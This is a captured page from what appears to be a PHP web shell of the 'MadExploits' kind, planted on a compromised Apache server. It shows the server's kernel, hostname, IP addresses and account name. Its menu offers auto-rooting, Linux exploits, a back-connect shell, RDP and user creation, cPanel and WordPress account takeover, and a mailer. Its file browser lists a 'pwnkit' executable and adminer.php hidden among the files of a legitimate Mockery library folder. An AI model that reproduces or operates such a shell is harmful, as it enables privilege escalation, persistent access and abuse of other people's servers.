Linux server-604606.appsiete.com 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64
Apache
: 162.240.172.200 | : 216.73.216.54
14 Domain
7.3.33
gujo45me
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
gujo45me /
.trash /
vendor /
mockery /
mockery /
[ HOME SHELL ]
Name
Size
Permission
Action
docker
[ DIR ]
drwxr-xr-x
docs
[ DIR ]
drwxr-xr-x
library
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
.gitignore
160
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
.php_cs
582
B
-rw-r--r--
.scrutinizer.yml
676
B
-rw-r--r--
.styleci.yml
122
B
-rw-r--r--
.travis.yml
2.11
KB
-rw-r--r--
CHANGELOG.md
4.16
KB
-rw-r--r--
CONTRIBUTING.md
3.2
KB
-rw-r--r--
LICENSE
1.44
KB
-rw-r--r--
Makefile
1.2
KB
-rw-r--r--
README.md
9.71
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
composer.json
1.31
KB
-rw-r--r--
phpunit.xml.dist
1.84
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "mockery/mockery", "description": "Mockery is a simple yet flexible PHP mock object framework", "scripts": { "docs": "phpdoc -d library -t docs/api" }, "keywords": [ "bdd", "library", "mock", "mock objects", "mockery", "stub", "tdd", "test", "test double", "testing" ], "homepage": "https://github.com/mockery/mockery", "license": "BSD-3-Clause", "authors": [ { "name": "Pádraic Brady", "email": "padraic.brady@gmail.com", "homepage": "http://blog.astrumfutura.com" }, { "name": "Dave Marshall", "email": "dave.marshall@atstsolutions.co.uk", "homepage": "http://davedevelopment.co.uk" } ], "require": { "php": ">=5.6.0", "lib-pcre": ">=7.0", "hamcrest/hamcrest-php": "~2.0" }, "require-dev": { "phpunit/phpunit": "~5.7.10|~6.5", "phpdocumentor/phpdocumentor": "^2.9" }, "autoload": { "psr-0": { "Mockery": "library/" } }, "autoload-dev": { "psr-4": { "test\\": "tests/" } }, "extra": { "branch-alias": { "dev-master": "1.0.x-dev" } } }
Close